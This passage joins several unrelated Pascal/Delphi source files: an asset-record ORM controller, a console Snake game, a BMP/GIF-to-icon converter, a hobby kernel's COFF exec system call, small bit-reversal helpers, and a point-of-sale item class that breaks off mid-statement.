Documento for I := 0 to pObjeto.ListaPatrimDocumentoBemVO.Count - 1 do begin DocumentoBem := pObjeto.ListaPatrimDocumentoBemVO[I]; if DocumentoBem.Id > 0 then Result := TT2TiORM.Alterar(DocumentoBem) else begin DocumentoBem.IdPatrimBem := pObjeto.Id; Result := TT2TiORM.Inserir(DocumentoBem) > 0; end; end; // Depreciação for I := 0 to pObjeto.ListaPatrimDepreciacaoBemVO.Count - 1 do begin DepreciacaoBem := pObjeto.ListaPatrimDepreciacaoBemVO[I]; if DepreciacaoBem.Id > 0 then Result := TT2TiORM.Alterar(DepreciacaoBem) else begin DepreciacaoBem.IdPatrimBem := pObjeto.Id; Result := TT2TiORM.Inserir(DepreciacaoBem) > 0; end; end; // Movimentação for I := 0 to pObjeto.ListaPatrimMovimentacaoBemVO.Count - 1 do begin MovimentacaoBem := pObjeto.ListaPatrimMovimentacaoBemVO[I]; if MovimentacaoBem.Id > 0 then Result := TT2TiORM.Alterar(MovimentacaoBem) else begin MovimentacaoBem.IdPatrimBem := pObjeto.Id; Result := TT2TiORM.Inserir(MovimentacaoBem) > 0; end; end; finally end; end; class function TPatrimBemController.Exclui(pId: Integer): Boolean; var ObjetoLocal: TPatrimBemVO; begin try ObjetoLocal := TPatrimBemVO.Create; ObjetoLocal.Id := pId; Result := TT2TiORM.Excluir(ObjetoLocal); finally FreeAndNil(ObjetoLocal) end; end; initialization Classes.RegisterClass(TPatrimBemController); finalization Classes.UnRegisterClass(TPatrimBemController); end.
program MultiPlayerSnake; uses crt, sysutils; //if you want to setup board anywhere on the screen, note this: //widthStart + width <=110 ; default:91 //heightStart + height <=30 ; default:28 //(widthStart,Heightstart) is the position of the top left corner of the board const width = 90; height = 24; widthStart = 4; heightStart = 6; Type dir = (up,down,left,right); positionRec = record X,Y : byte; End; snakeRec = record direction : dir; head : positionRec; length : integer; tail : array [1..100] of positionRec; colour : byte; headChar, tailChar : char; dead : boolean; end; foodRec = record position : positionRec; prevPosition : positionRec; exists : Boolean; end; Var snake : array [1..2] of snakeRec; allDead :byte; food : foodRec; gameMode:string; gameSpeed:integer=70; (*Default speed*) player1color:integer=7; (*Default color (WHITE)*) player2color:integer=3; (*Default color (SKY BLUE)*) Function randomPosition : positionRec; //Returns a new random position on the board var position : positionRec; playerNo : Byte; tailNo : Integer; validPosition : boolean; begin repeat validPosition := true; position.X := random(width-3)+2; position.Y := random(height-3)+2; //Collision with snake/s check for playerNo := 1 To 2 Do //Needs to be changed with max no of players begin if (position.X =snake[playerNo].head.X) and (position.Y = snake[playerNo].head.Y) then validPosition :=false; for tailNo := 1 To snake[playerNo].length Do If (position.X = snake[playerNo].tail[tailNo].X) AND (position.Y = snake[playerNo].tail[tailNo].Y) then validPosition := false; end; until validPosition = true; randomPosition := position; end; Procedure initSnakes(var numberOfPlayers : byte); var playerNo : byte; begin snake[1].head.X := (width div 3)*2+2; snake[2].head.X := (width div 3); for playerNo := 1 To numberOfPlayers Do begin snake[playerNo].head.Y := heightStart+1; snake[playerNo].direction := down; snake[playerNo].length := 2; snake[playerNo].tail[1].X := snake[playerNo].head.X; snake[playerNo].tail[1].Y := 5; snake[playerNo].dead := false; end; end; Procedure drawSnake(playerNo : byte); var Count : Integer; begin cursoroff; textcolor(Snake[PlayerNo].Colour); gotoXY(widthStart+snake[playerNo].Head.X,heightStart+Snake[playerNo].head.Y); write(snake[playerNo].headChar); for count := snake[playerNo].length-1 downTo 1 do begin gotoXY(widthStart+snake[playerNo].tail[count].X,heightStart+snake[playerNo].tail[count].Y); write(snake[playerNo].tailChar); end; {Remove end tail} If snake[playerNo].Tail[snake[playerNo].length].X > 0 Then {If tail exists} begin gotoXY(widthStart+snake[playerNo].tail[snake[playerNo].length].X,heightStart+snake[playerNo].Tail[Snake[PlayerNo].Length].Y); Write(' '); End; End; Function snakeCollision(var playerNo : Byte) : boolean; var Count : Integer; //other:integer; begin {self collision} for count := snake[playerNo].Length+2 downto 1 do If (snake[playerNo].tail[count].X = snake[playerNo].head.X) and (snake[playerNo].tail[count].Y = snake[playerNo].head.Y) then exit(true); {Player 1 collision with player 2} If PlayerNo = 1 Then Begin For Count := Snake[PlayerNo].Length+2 Downto 1 Do If (Snake[2].Tail[Count].X = Snake[1].Head.X) AND (Snake[2].Tail[Count].Y = Snake[1].Head.Y) then exit(true); end; {Player 2 collision with player 1} If PlayerNo = 2 Then Begin For Count := Snake[1].Length+2 Downto 1 Do If (Snake[1].Tail[Count].X = Snake[2].Head.X) AND (Snake[1].Tail[Count].Y = Snake[2].Head.Y) then exit(true); end; exit(false); end; function collision(playerNo : byte) : boolean; begin exit ((snake[playerNo].head.X = width) or (snake[playerNo].head.X=0) or (snake[playerNo].head.Y=height) or (snake[playerNo].head.Y=0)or (snakeCollision(playerNo) = true)); end; Procedure moveSnake(playerNo : byte); var count : integer; begin cursoroff; for count := snake[playerNo].length downto 2 do begin snake[playerNo].Tail[count] := snake[playerNo].tail[count-1] end; snake[playerNo].Tail[1] := snake[playerNo].head; case snake[playerNo].direction of right : snake[playerNo].head.X := snake[playerNo].head.X+1; left : snake[playerNo].head.X := snake[playerNo].head.X-1; up : snake[playerNo].head.Y := snake[playerNo].head.Y-1; down : snake[playerNo].head.Y := snake[playerNo].head.Y+1; end; end; Procedure placefood; Begin textcolor(12); If food.exists = True Then If (food.position.X > 0) Or (Food.Position.Y > 0) then begin goToXY(widthStart+Food.Position.X,heightStart+Food.Position.Y); textColor(lightcyan); write(Chr(149)); delay(100); gotoXY(widthStart+Food.Position.X,heightStart+Food.Position.Y); write(' '); end; food.position := RandomPosition; gotoXY(widthStart+Food.Position.X,heightStart+Food.Position.Y); textColor(lightcyan); write(chr(149)); //writes a bigger dot food.exists := true; end; Procedure doFood(numberOfPlayers : Byte); var Count : Integer; begin if not food.exists Then placefood; {Check if food's been eaten} for count := 1 To numberOfPlayers do begin If (snake[count].head.X = food.position.X) and (snake[count].head.Y = food.position.Y) then begin food.exists := false; snake[count].length := snake[count].length+1; end; end; end; procedure SetUpGame(numberOfPlayers : Byte); begin food.exists := false; allDead := 0; initSnakes(numberOfPlayers); end; Procedure GameOver(numberOfPlayers : byte); Var PlayerNo : Byte; Begin if snake[1].Length > Snake[2].length Then playerNo := 1; if snake[1].Length < Snake[2].length Then playerNo := 2; if snake[1].length = Snake[2].length Then playerNo := 3; gotoXY(widthStart+4,heightStart+3); textColor(12); write(' GAME OVER! '); //Single player score message If numberOfPlayers = 1 then begin textColor(Snake[1].Colour); write('Score: ',Snake[1].Length-2,' '); end; //Two player score message If numberOfPlayers = 2 then begin If playerNo = 3 Then //If it's a draw Write('It was a draw! ') else begin //If not a draw textColor(Snake[PlayerNo].Colour); write('Player ',PlayerNo,' '); textColor(12); write('wins! '); goToXY(widthStart+5,heightStart+4); textcolor(snake[1].colour); writeln('Player 1 Length:',snake[1].length-2); goToXY(widthStart+5,heightStart+5); textcolor(snake[2].colour); writeln('Player 2 Length:', snake[2].length-2); end; end; gotoxy(widthstart,heightstart+height+1); halt; end; Procedure PlayGame(numberOfPlayers : Byte); Var playerNo,playerNo2 : Byte; k:char; //keypressed Begin repeat doFood(numberOfPlayers); delay(gameSpeed); If Keypressed then k := readkey; Case k of //Upper and Lower case WASD 'w', 'W' : if Snake[2].direction <> down then Snake[2].Direction := up; 's', 'S' : if Snake[2].direction <> up then Snake[2].Direction := down; 'a', 'A' : if Snake[2].direction <> right then Snake[2].Direction := left; 'd', 'D' : if Snake[2].direction <> left then Snake[2].Direction := right; //Arrow keys #0 : Begin k := Readkey; Case k of #72 : if Snake[1].direction <> down then Snake[1].direction := up; #80 : if Snake[1].direction <> up then Snake[1].direction := down; #75 : if Snake[1].direction <> right then Snake[1].direction := left; #77 : if Snake[1].direction <> left then Snake[1].direction := right; end; end end; For playerNo := 1 To numberOfPlayers Do begin if snake[PlayerNo].dead = false Then begin moveSnake(playerNo); if (collision(playerNo)) then begin snake[playerNo].dead := true; allDead := allDead+1; end else drawSnake(playerNo); end; end; if numberOfPlayers > 1 then if allDead = numberOfPlayers-1 then for PlayerNo := 1 to numberOfPlayers do if snake[PlayerNo].dead = false then for playerNo2 := 1 to numberOfPlayers do if snake[playerNo].length > snake[playerNo2].length Then allDead := numberOfPlayers; until allDead = numberOfPlayers; gameOver(numberOfPlayers); end; procedure resetSnake(SnakeNo : Byte); begin case snakeNo Of 1 : snake[snakeNo].colour := player1color; 2 : snake[snakeNo].colour := player2color; end; snake[snakeNo].headChar := 'O'; snake[snakeNo].tailChar := 'x'; end; procedure initOptions; begin resetSnake(1); resetSnake(2); end; procedure generateoutline; var x:integer; begin gotoxy(widthstart,heightstart); for x:=1 to (width div 2) do write('.x'); gotoxy(widthstart,height+heightStart); for x:=1 to (width div 2) do write('.x'); for x:=1 to (height-1) do begin gotoxy(widthStart,heightstart+x); writeln('x'); end; for x:=1 to (height-1) do begin gotoxy(widthstart+width,heightstart+x); write('x'); end; end; procedure movestartscreen(var a:integer); var b,p:integer; begin textcolor(yellow); a+=1; b:=a; if a=79 then a:=1; (*79+length(multiplayer snake game)=100*) gotoxy(a,12); (*multiplayer snake game is in the 12th row*) write('MUTIPLAYER SNAKE GAME'); gotoxy(a,13); (*press enter is in the 13th row*) write('PRESS ANY KEY TO BEGIN'); if a<>1 then begin gotoxy(a-1,12); write(' '); gotoxy(a-1,13); write(' '); end; if b=79 then begin for p:=b to 100 do begin (*100 being the total width*) gotoxy(p-1,12); write(' '); gotoxy(p-1,13); write(' '); end; end; cursoroff; end; procedure startscreen; // The first screen to appear var a: integer=2; //for moving the 'press enter' statements coolProject:array [0..10]of string=('C','O','O','L','P','R','O','J','E','C','T'); begin // Begin startscreen repeat // Begin finding random spot randomize; movestartscreen(a); textcolor(green); gotoxy(random(100)+1,random(27)+1); write (coolProject[random(11)]); gotoxy(random(100)+1,random(27)+1); write(chr(random(128)+128)); delay(100); until keypressed // End print end; // End startscreen procedure mainMenu; var inp:string; (*input for game modes (1,2,3,4 or 5*) colinp,spinp:string; (*input for color setting*) begin repeat clrscr; textcolor(white); gotoxy(1,40); writeln('Welcome to the Snake game'); gotoxy(1,2); writeln(); textcolor(white); writeln('1. Single Player Mode'); writeln('2. Multi-Player Mode'); writeln('3. Exit'); writeln('Select an option(type 1,2,3)'); cursoron; readln(gamemode); if gamemode='3' then exit; if gamemode='1' then exit; until (gamemode='2'); repeat clrscr; textcolor(white); gotoxy(40,5); writeln('Speed and Skin Colors'); gotoxy(10,10); textcolor(yellow); writeln('Player 1'); gotoxy(10,12); textcolor(7); writeln('1.Speed = ',gameSpeed); gotoxy(10,15); textcolor(player1color); write('2.ooooooo'); gotoxy(80,10); textcolor(yellow); writeln('player 2'); gotoxy(80,12); textcolor(7); writeln('3.Speed = ',gameSpeed); gotoxy(80,15); textcolor(player2color); write('4.xxxxxO'); gotoxy(1,17); textcolor(7); writeln('Press 1,2,3 or 4 to change settings. Press 5 to begin'); cursoron; repeat readln(inp); until (inp='1') or (inp='2') or (inp='3') or (inp='4') or (inp='5'); if (inp='2') or (inp='4') then begin writeln('1. Blue'); writeln('2.Green'); writeln('3.Cyan'); writeln('4.Red'); writeln('5.Magneta'); writeln('Enter a number (1..5)'); repeat readln(colinp); until (colinp='1') or (colinp='2') or (colinp='3') or (colinp='4') or (colinp='5'); if inp='2' then player1color:=strtoint(colinp) else player2color:=strtoint(colinp); end else if (inp='1') or (inp='3') then begin writeln('1. Hard (speed=40)'); writeln('2. Medium (speed=100)'); writeln('3. Easy (speed=140)'); repeat readln(spInp); (*for color*) until (spInp='1') or (spInp='2') or (spInp='3'); if spinp='1' then gameSpeed:=40 else if spinp='2'then gameSpeed:=100 else gameSpeed:=140; end; until (inp='5') or (gameMode='1'); end; Begin randomize; clrscr; startscreen; mainMenu; initOptions; case gameMode of '1' : begin clrscr; generateoutline; setUpGame(1); playGame(1); end; '2' : begin clrscr; generateoutline; setUpGame(2); playGame(2); end; '3' : exit; end; end.
unit uBMPtoICO; interface uses Windows, Graphics, litegifX2; function BMPToICO(SourceBMP: TBitMap): TIcon;forward; function GIFToICO(SourceGIF: TGif; FrameNumber: integer): TIcon;forward; implementation //Нужно создать два bitmap'а: bitmap-маску ("AND" bitmap) и //bitmap-картинку (XOR bitmap). Потом передать дескрипторы "AND" и "XOR" //bitmap-ов API функции CreateIconIndirect(): function BMPToICO(SourceBMP: TBitMap): TIcon; var IconSizeX: integer; IconSizeY: integer; AndMask: TBitmap; XOrMask: TBitmap; IconInfo: TIconInfo; //Icon: TIcon; begin {Get the icon size} IconSizeX := GetSystemMetrics(SM_CXICON); IconSizeY := GetSystemMetrics(SM_CYICON); {Create the "And" mask} AndMask := TBitmap.Create; AndMask.Monochrome := true; AndMask.Width := IconSizeX; AndMask.Height := IconSizeY; {Draw on the "And" mask} // AndMask.Canvas.Brush.Color := clWhite; // AndMask.Canvas.Brush.Color := SourceBMP.TransparentColor; // AndMask.TransparentColor := SourceBMP.TransparentColor; // AndMask.Canvas.FillRect(Rect(0, 0, IconSizeX, IconSizeY)); // AndMask.Canvas.Brush.Color := clBlack; // AndMask.Canvas.Ellipse(4, 4, IconSizeX - 4, IconSizeY - 4); AndMask.Assign(SourceBMP); {Draw as a test} // Form1.Canvas.Draw(IconSizeX * 2, IconSizeY, AndMask); {Create the "XOr" mask} XOrMask := TBitmap.Create; XOrMask.Width := IconSizeX; XOrMask.Height := IconSizeY; {Draw on the "XOr" mask} XOrMask.Canvas.Brush.Color := ClBlack; // XOrMask.Canvas.Brush.Color := SourceBMP.TransparentColor; // XOrMask.TransparentColor := SourceBMP.TransparentColor; // XOrMask.Canvas.FillRect(Rect(0, 0, IconSizeX, IconSizeY)); // XOrMask.Canvas.Pen.Color := clRed; // XOrMask.Canvas.Brush.Color := clRed; // XOrMask.Canvas.Ellipse(4, 4, IconSizeX - 4, IconSizeY - 4); XOrMask.Assign(SourceBMP); {Draw as a test} // Form1.Canvas.Draw(IconSizeX * 4, IconSizeY, XOrMask); {Create a icon} Result := TIcon.Create; IconInfo.fIcon := true; IconInfo.xHotspot := 0; IconInfo.yHotspot := 0; IconInfo.hbmMask := AndMask.Handle; IconInfo.hbmColor := XOrMask.Handle; Result.Handle := CreateIconIndirect(IconInfo); {Destroy the temporary bitmaps} AndMask.Free; XOrMask.Free; {Draw as a test} //Form1.Canvas.Draw(IconSizeX * 6, IconSizeY, Icon); {Assign the application icon} //Application.Icon := Icon; {Force a repaint} //InvalidateRect(Application.Handle, nil, true); {Free the icon} // Result := Icon; end; function GIFToICO(SourceGIF: TGif; FrameNumber: integer): TIcon; var IconSizeX: integer; IconSizeY: integer; AndMask: TBitmap; XOrMask: TBitmap; IconInfo: TIconInfo; Mask: TBitmap; TempB: TBitmap; begin {Get the icon size} IconSizeX := GetSystemMetrics(SM_CXICON); IconSizeY := GetSystemMetrics(SM_CYICON); {Create the "And" mask} AndMask := TBitmap.Create; //Mask := TBitmap.Create; - утечка AndMask.Monochrome := true; AndMask.Width := IconSizeX; AndMask.Height := IconSizeY; {Draw on the "And" mask} // AndMask.Canvas.Brush.Color := clWhite; //Mask.Assign(SourceGIF.Bitmap[FrameNumber]); - лишнее TempB := SourceGIF.GetStripBitmap(Mask); TempB.Free; //функция создает картинку, которая нам не нужна AndMask.Assign(Mask); {Draw as a test} // Form1.Canvas.Draw(IconSizeX * 2, IconSizeY, AndMask); {Create the "XOr" mask} XOrMask := TBitmap.Create; XOrMask.Width := IconSizeX; XOrMask.Height := IconSizeY; {Draw on the "XOr" mask} XOrMask.Canvas.Brush.Color := ClBlack; XOrMask.Assign(SourceGIF.Bitmap[FrameNumber]); {Draw as a test} // Form1.Canvas.Draw(IconSizeX * 4, IconSizeY, XOrMask); {Create a icon} Result := TIcon.Create; IconInfo.fIcon := true; IconInfo.xHotspot := 0; IconInfo.yHotspot := 0; IconInfo.hbmMask := AndMask.Handle; IconInfo.hbmColor := XOrMask.Handle; Result.Handle := CreateIconIndirect(IconInfo); {Destroy the temporary bitmaps} AndMask.Free; XOrMask.Free; Mask.Free; {Draw as a test} //Form1.Canvas.Draw(IconSizeX * 6, IconSizeY, Icon); {Assign the application icon} //Application.Icon := Icon; {Force a repaint} //InvalidateRect(Application.Handle, nil, true); {Free the icon} //Result := Icon; end; end.
Unit Exec; { * Exec : * * * * Esta Unidad se encarga de realizar la llamada al sistema * * SYS_EXEC , utiliza archivos COFF. * * * * * Copyright (c) 2003-2006 Matias Vara <matiasevara@gmail.com> * * All Rights Reserved * * * * Versiones : * * 07 / 02 / 2005 : Exec() soporta argumentos!!!! * * * * 29 / 05 / 2004 : Es modificada la llamada Exec() , los * * segmentos de codigo , datos y pila se ponen en un unico * * hueco de memoria * * * * 19 / 05 / 2004 : Es aplicado el modelo de memoria paginado * * El codigo y datos son puestos en una unica area vmm , no asi el * * stack , que se encuentra en STACK_AREA * * * * 13 / 04 / 2004 : Primera Version * * * * * ******************************************************************* } interface {DEFINE DEBUG} {$I ../include/toro/procesos.inc} {$I ../include/head/asm.h} {$I ../include/head/open.h} {$I ../include/head/inodes.h} {$I ../include/head/super.h} {$I ../include/head/dcache.h} {$I ../include/toro/coff.inc} {$I ../include/toro/buffer.inc} {$I ../include/head/buffer.h} {$I ../include/head/mm.h} {$I ../include/head/scheduler.h} {$I ../include/head/printk_.h} {$I ../include/head/itimer.h} {$I ../include/head/paging.h} {$I ../include/head/vmalloc.h} {$I ../include/head/procesos.h} {$I ../include/head/namei.h} const MAX_ARG_PAGES = 10 ; implementation {$I ../include/head/lock.h} { * get_args_size : simple funcion que devuelve el tama¤o de los argumentos * } function get_args_size (args : pchar) : dword; var cont : dword ; begin cont := 0 ; If args = nil then exit(1); while (args^ <> #0) do begin args += 1; If (cont div Page_Size) = Max_Arg_Pages then break else cont += 1; end; exit(cont + 1); end; { * get_argc : devuelve la cantidad de argumentos pasados * } function get_argc ( args : pchar) : dword ; var tmp : dword ; begin if args = nil then exit(0); tmp := 0 ; { esto puede seguir hasta el infinito!!! } while (args^ <> #0) do begin if args^ = #32 then tmp += 1; args += 1; end; tmp += 1 ; if (args-1)^ = #32 then tmp -= 1 ; exit(tmp); end; { * Sys_Exec : * * * * Path : Ruta donde se encuentra el archivo * * args : Puntero a un array de argunmentos . No utilizado por ahora * * Devuelve : 0 si falla o El pid de la nueva tarea * * * * Esta funcion carga en memoria un archivo ejecutable del tipo COFF * * y devuelve el PID del nuevo proceso , si la operacion no hubiese sido * * correcta devuelve 0 * * Esta basado en la llamada al sistema sys_exec del kernel de ROUTIX * * Routix / src / syscalls / sys_proc.c * * Routix.sourceforge.net * * * ************************************************************************** } function sys_exec(path , args : pchar):dword;cdecl ; [public , alias : 'SYS_EXEC']; var tmp:p_inode_t; nr_sec,ver,count:word; coff_hd:p_coff_header; argccount , ret,count_pg,nr_page,ppid,argc:dword; _text,_data,_bbs:coff_sections; opt_hd:coff_optheader; l:p_coff_sections; tmp_fp:file_t; buff:array[1..100] of byte; new_tarea:p_tarea_struc; cr3_save , page,page_args,pagearg_us: pointer; nd : pchar ; r : dword ; k : dword ; label _exit; begin r := contador ; ppid := Tarea_Actual^.pid; tmp := name_i(path); set_errno := -ENOENT ; {ruta invalida} If (tmp = nil) then exit(0); set_errno := -EACCES ; {el inodo deve tener permisos de ejecucion y de lectura} if (tmp^.flags and I_XO <> I_XO) and (tmp^.flags and I_RO <> I_RO) then goto _exit ; set_errno := -ENOEXEC ; if (tmp^.mode <> dt_Reg) then goto _exit ; {Se crea un descriptor temporal} tmp_fp.inodo := tmp; tmp_fp.f_pos := 0; tmp_fp.f_op := tmp^.op^.default_file_ops ; coff_hd:=@buff; {Leo la cabecera del archivo coff y la mando a un buffer} ret := tmp_fp.f_op^.read(@tmp_fp,sizeof(coff_header),coff_hd); set_errno := -EIO ; {Si hubiese algun error al leer el archivo} If (ret = 0) then goto _exit ; set_errno := -ENOEXEC; {Se chequea el numero magico} If (coff_hd^.f_magic <> COFF_MAGIC) then goto _exit; set_errno := -ENOEXEC; {El archivo COFF devera tener 3 secciones = TEXT , DATA, BBS} If coff_hd^.f_nscns <> 3 then goto _exit; ret := tmp_fp.f_op^.read(@tmp_fp,sizeof(coff_optheader),@opt_hd); {Me posiciono donde se encuentran las cabezas de secciones} tmp_fp.f_pos := sizeof(coff_header) + coff_hd^.f_opthdr; nr_sec := coff_hd^.f_nscns; ver := 0; l := @buff; set_errno := -EIO; while (nr_sec <> 0) do begin {Leo las secciones} ret := tmp_fp.f_op^.read(@tmp_fp,sizeof(coff_sections),l); {hubo un error de lectura} If (ret = 0) then goto _exit ; {Se evalua el tipo de seccion} Case l^.s_flags of COFF_TEXT:begin memcopy(@buff,@_text,sizeof(coff_sections)); ver:=ver or COFF_TEXT; end; COFF_DATA:begin memcopy(@buff,@_data,sizeof(coff_sections)); ver:=ver or COFF_DATA; end; COFF_BBS:begin memcopy(@buff,@_bbs,sizeof(coff_sections)); ver:=ver or COFF_BBS; end; else goto _exit ; end; nr_sec-=1; end; set_errno := -ENOEXEC; {Se chequea que se encuentren todas las secciones} If ver <> (COFF_BBS or COFF_DATA or COFF_TEXT) then goto _exit ; {Se crea el proceso} new_tarea := Proceso_Crear(ppid,Sched_RR); If (new_tarea=nil) then goto _exit ; Mem_Lock ; If (_text.s_size + _data.s_size + _bbs.s_size) >= MM_MEMFREE then begin Proceso_Eliminar (new_tarea); goto _exit ; end; {Area de Codigo} {Aqui tambien se encuentran los datos y el codigo} with new_tarea^.text_area do begin size := 0 ; flags := VMM_WRITE; add_l_comienzo := pointer(HIGH_MEMORY); add_l_fin := pointer(HIGH_MEMORY - 1); end; {Stack} with new_tarea^.stack_area do begin size := 0; flags := VMM_WRITE; add_l_comienzo := pointer(STACK_PAGE); add_l_fin := pointer(STACK_PAGE - 1); end; { tama¤o de los argumentos } argc := get_args_size (args) ; { cantidad de argumentos pasados } argccount := get_argc(args) ; {Solo se soportan 4096 bytes de argumentos } page_Args := get_free_kpage ; If argc > 1 then begin {Hay argumentos} If argc > Page_Size then argc := Page_Size ; {Son copiados los argumentos} memcopy(args, page_Args + (Page_size - argc)-1 , argc); end else begin {No hay argumentos} nd := Page_args; nd += Page_size - 2 ; nd^ := #0 ; end; Save_Cr3; Load_Kernel_Pdt; {Es leido el archivo completo } count:=0; count_pg:=0; nr_page := (_text.s_size + _data.s_size) div Page_Size ; If ((_text.s_size + _data.s_size) mod Page_Size ) = 0 then else nr_page+=1; tmp_fp.f_pos:=_text.s_scnptr; k := contador ; repeat page := get_free_page; If page = nil then begin vmm_free(new_tarea,@new_tarea^.text_area); Proceso_Eliminar(new_tarea); Mem_Unlock; goto _exit ; end; count += tmp_fp.f_op^.read(@tmp_fp,Page_Size,page); vmm_map(page,new_tarea,@new_tarea^.text_area); count_pg+=1; until (nr_page = count_pg); k := contador - k ; {Se verifica que la cantidad leidos sean correctos} If count <> (_text.s_size + _data.s_size) then begin vmm_free(new_tarea,@new_tarea^.text_area); vmm_free(new_tarea,@new_tarea^.data_area); Proceso_Eliminar(new_tarea); Mem_Unlock; goto _exit ; end; {Las areas de datos no inicializados son alocadas} vmm_alloc(new_tarea,@new_tarea^.text_area,_bbs.s_size); vmm_alloc(new_tarea,@new_tarea^.stack_area,Page_Size); {Entrada estandar y salida estandar} clone_filedesc(@Tarea_Actual^.Archivos[1],@new_tarea^.Archivos[1]); clone_filedesc(@Tarea_Actual^.Archivos[2],@new_tarea^.Archivos[2]); {La pagina deve ser de la zona alta y no de la del kernel} pagearg_us := get_free_page ; memcopy(page_args , pagearg_us , Page_Size); {No se necesita mas la pagina} free_page (page_args); {Se mapea la pagina de argumentos} vmm_map(pagearg_us,new_tarea,@new_tarea^.stack_area); {Se libera la proteccion de la memoria} Mem_Unlock; new_tarea^.reg.esp := pointer(new_tarea^.stack_area.add_l_fin - argc) ; new_tarea^.reg.eip := pointer(opt_hd.entry); { son pasados los argumentos } new_tarea^.reg.eax := argccount ; new_tarea^.reg.ebx := longint(new_tarea^.reg.esp) ; new_tarea^.reg.ecx := 0 ; { la nueva tarea tiene como directorio de trabajo el cwd de la tarea que realizo el exec } Tarea_actual^.cwd^.count += 1 ; Tarea_Actual^.cwd^.i_dentry^.count += 1 ; new_tarea^.cwd := Tarea_Actual^.cwd ; Restore_Cr3; {$IFDEF DEBUG} printk('/nsys_exec : Head Section Sizes\n',[],[]); printk('/nText : %d \n',[_text.s_size],[]); printk('/nData : %d \n',[_data.s_size],[]); printk('/nBbs : %d \n',[_bbs.s_size],[]); printk('/npid : %d\n',[new_tarea^.pid],[]); printk('/nDuracion : %d milis.\n',[contador-r],[]); printk('/nTiempo de io : %d milise.\n',[k],[]); printk('/nParametros : %d \n',[argccount],[]); {$ENDIF} add_task (new_tarea); put_dentry(tmp^.i_dentry); clear_errno; exit(new_tarea^.pid); _exit : {$IFDEF debug} printk('/Vexec/n: Error de lectura de archivo\n',[],[]); {$ENDIF} put_dentry (tmp^.i_dentry); exit(0); end; end.
unit ucom; {$mode objfpc}{$H+} interface uses Classes, SysUtils, graphics; function ReverseNum(dat: byte): byte; function ReverseByte(dat: byte): byte; function ReverseWord(dat: Word): Word; procedure ExtractRGB(Color: TColor;var R,G,B:Byte); implementation function ReverseNum(dat: byte): byte; const RevTable: array[0..15] of byte = ($0, $8, $4, $C, $2, $A, $6, $E, $1, $9, $5, $D, $3, $B, $7, $F); begin if dat < 16 then Result := RevTable[dat] else Result := 0; end; function ReverseByte(dat: byte): byte; begin Result := ReverseNum(dat div 16) + ReverseNum(dat mod 16) * 16; end; function ReverseWord(dat: Word): Word; begin Result := ReverseByte(dat div 256) + Word(ReverseByte(dat mod 256)) * 256; end; procedure ExtractRGB(Color: TColor;var R,G,B:Byte); begin R := Color and $FF; G := (Color and $FF00) shr 8; B := (Color and $FF0000) shr 16; end; end.
unit uSaleItem; interface uses SysUtils; type TSaleItem = class private FDiscount: Currency; FCostPrice: Currency; FSellingPrice: Currency; FQty: Double; FIDCommission: Integer; FIDCustomer: Integer; FIDModel: Integer; FIDStore: Integer; FIDUser: Integer; FIDPreSale: Integer; FIDPreInventoryMovParent: Integer; FIDItemExchange: Integer; FPreSaleDate: TDateTime; FIDPreInventoryMov: Integer; FExchange: Boolean; FIDInvoiceExchange: Integer; FDepartment: Integer; FPromo: Boolean; FKitSellingPrice : Currency; FCustomerSellingPrice : Currency; FPromoSellingPrice : Currency; FIsManager : Boolean; FAskedSalePrice: Boolean; FSuggPrice: Currency; FIDVendorPrice: Integer; FIDDescriptionPrice: Integer; FIDDocumentType: Integer; FDocumentNumber: String; FBarcode: String; // Antonio Apr 2014 03 - new fields to sp addItem FManualPrice: Currency; FManualDiscount: Currency; FIDSpecialPrice: Integer; FIsManualPrice: Boolean; FIsManualDiscount: Boolean; FEachDiscount: currency; procedure OnBeforeAdd; procedure UpdateParentPromo(IDPreInventoryMovParent: Integer); procedure OnBeforeUpdate; procedure ApplyDiscount; public procedure CleanUpValues(); procedure Add; procedure Update; procedure Remove; procedure SetDiscountItem(SaleItem: TSaleItem; DiscountSaleValue: Double; TaxExemptOnSale: Boolean); property IDPreInventoryMov: Integer read FIDPreInventoryMov write FIDPreInventoryMov; property IDCustomer: Integer read FIDCustomer write FIDCustomer; property IDPreSale: Integer read FIDPreSale write FIDPreSale; property IDPreInventoryMovParent: Integer read FIDPreInventoryMovParent write FIDPreInventoryMovParent; property IDInvoiceExchange: Integer read FIDInvoiceExchange write FIDInvoiceExchange; property IDModel: Integer read FIDModel write FIDModel; property IDStore: Integer read FIDStore write FIDStore; property Qty: Double read FQty write FQty; property Discount: Currency read FDiscount write FDiscount; property SellingPrice: Currency read FSellingPrice write FSellingPrice; property CostPrice: Currency read FCostPrice write FCostPrice; property IDUser: Integer read FIDUser write FIDUser; property IDCommission: Integer read FIDCommission write FIDCommission; property PreSaleDate: TDateTime read FPreSaleDate write FPreSaleDate; property IDItemExchange: Integer read FIDItemExchange write FIDItemExchange; property Exchange: Boolean read FExchange write FExchange; property Promo: Boolean read FPromo write FPromo; property Department: Integer read FDepartment write FDepartment; property KitSellingPrice : Currency read FKitSellingPrice write FKitSellingPrice; property CustomerSellingPrice : Currency read FCustomerSellingPrice write FCustomerSellingPrice; property PromoSellingPrice : Currency read FPromoSellingPrice write FPromoSellingPrice; property IsManager : Boolean read FIsManager write FIsManager; property AskedSalePrice: Boolean read FAskedSalePrice write FAskedSalePrice Default false; property IDDescriptionPrice: Integer read FIDDescriptionPrice write FIDDescriptionPrice; property IDVendorPrice: Integer read FIDVendorPrice write FIDVendorPrice; property SuggPrice: Currency read FSuggPrice write FSuggPrice; property IDDocumentType: Integer read FIDDocumentType write FIDDocumentType; property DocumentNumber: String read FDocumentNumber write FDocumentNumber; property Barcode: String read FBarcode write FBarcode; property ManualPrice: Currency read FManualPrice write FManualPrice; property ManualDiscount: Currency read FManualDiscount write FManualDiscount; property IDSpecialPrice: Integer read FIDSpecialPrice write FIDSpecialPrice; property IsManualPrice: Boolean read FIsManualPrice write FIsManualPrice; property IsManualDiscount: Boolean read FIsManualDiscount write FIsManualDiscount; property EachDiscount: currency read FEachDiscount write FEachDiscount; end; implementation uses uDM, uMsgBox, uMsgConstant, uPassword, uDMCalcPrice, uNumericFunctions; { TSaleItem } procedure TSaleItem.Add; var iError: Integer; begin OnBeforeAdd; DM.fPOS.AddHoldItem(FIDCustomer, FIDPreSale, FIDModel, FIDStore, FQty, FDiscount, FSellingPrice, FCostPrice, FIDUser, FIDCommission, FPreSaleDate, Now, False, FIsManager, FIDItemExchange, FDepartment, iError, FIDPreInventoryMov, FIDPreInventoryMovParent, FPromo, FIDDescriptionPrice, FIDVendorPrice, FSuggPrice, FDocumentNumber, FIDDocumentType, 0, (FEachDiscount / FQty),//0, true, FManualPrice, 